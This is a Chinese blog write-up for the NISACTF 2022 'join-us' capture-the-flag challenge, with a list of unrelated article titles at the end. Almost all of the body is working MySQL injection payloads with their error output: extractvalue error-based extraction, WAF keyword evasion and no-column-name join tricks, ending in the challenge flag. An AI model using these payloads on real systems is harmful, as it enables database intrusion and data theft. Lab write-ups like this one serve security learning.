当前位置：首页 > news >正文

[NISACTF 2022]join-us - 报错注入无列名注入

news 2026/3/27 20:35:00

点击登录，找到注入点

这种框，可以直接爆破关键字，看是否拦截，也可以手动尝试，发现=、union、and、or、substr、database等关键字都拦截了
1、学到了：可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名，1'-a()# 或 1' || (select * from aa)#
　　FUNCTION sqlsql.a does not exist
2、直接甩一个报错注入上去，extractvalue(0,concat(0x7e,1,0x7e));#
　　没拦截，说明可以试一下
3、1' || extractvalue(0,concat(0x7e,1,0x7e));#
　　XPATH syntax error: ‘~ 1 ~’，说明报错成功了
4、1' || extractvalue(0,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'),1,30),0x7e));#
　　XPATH syntax error: ‘~ Fal_flag,output ~’
5、1' || extractvalue(0,concat(0x7e,mid((select group_concat(column_name) from Fal_flag),1,100),0x7e));#
　　不要耍小心思喔~ —— column被waf，无列名注入
　　1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag as a join Fal_flag as b)as c),1,100),0x7e));#
　　不要耍小心思喔~ —— as被waf，去掉as
　　1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b) c),1,100),0x7e));#
　　Duplicate column name ‘id’
　　1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id)) c),1,100),0x7e));#
　　Duplicate column name ‘data’
　　1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id,data)) c),1,100),0x7e));#
　　Duplicate column name ‘i_tell_u_this_is_Fal(se)_flag_is_in_another’ —— flag在另一个表（output）
6、1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b) c),1,100),0x7e));#
　　Duplicate column name ‘data’
　　1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),1,100),0x7e));#
　　XPATH syntax error: ‘~ NSSCTF{77a4667a-b16e-46a6-87…’
　　1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),20,100),0x7e));#
　　XPATH syntax error: ‘~ e-46a6-87fc-f981f48eeb5c} ~’

[NISACTF 2022]join-us - 报错注入无列名注入

相关文章：

[NISACTF 2022]join-us - 报错注入无列名注入

Raid10--Raid01介绍

集群服务器

大数据Doris（五）：开始编译 Doris

Linux软硬链接和动静态库

Linux shell编程学习笔记6：查看和设置变量的常用命令

leetcode 416.分割等和子集

Java基于SSM+Vue的平时成绩管理系统

flutter开发实战-webview插件flutter_inappwebview使用

Selenium 浏览器坐标转桌面坐标

1.6.C++项目：仿muduo库实现并发服务器之channel模块的设计

Redis代替session 实现登录流程

理解C++强制类型转换

《TCP/IP网络编程》代码实现

【Python】如何使用PyInstaller打包自己写好的代码

Java 线程的调度与时间片

Java项目-文件搜索工具

记录开发中遇到关于MySQL的一些问题-MySQL版

2023-10-06 LeetCode每日一题（买卖股票的最佳时机含手续费）

openGauss学习笔记-91 openGauss 数据库管理-内存优化表MOT管理-内存表特性-使用MOT-MOT使用MOT外部支持工具

蓝桥杯嵌入式备赛：STM32G431引脚复用功能表，一张图搞定定时器与ADC配置

5分钟制作Windows启动盘：Rufus免费工具终极指南

拯救大模型“幻觉”？Python RAG九大架构全解析

解锁汽车ECU诊断新可能：ECUBus-Pro开源工具的全场景应用指南

PX4飞控系统深度探索：如何用开源技术打造智能无人机控制大脑

UReport2实战：如何优雅地导出多Sheet页报表（动态/静态分页全解析）

万物皆含意识：基于 OFIRM 框架下“信息闭合与自动确认”机制的本体论重构（声明：这是一个理论假说）

课堂教学质量综合评分系统

如何用WechatFerry构建企业级微信自动化解决方案

ESP32开发实战：5分钟搞定MicroPython调用C库驱动LED（附完整代码）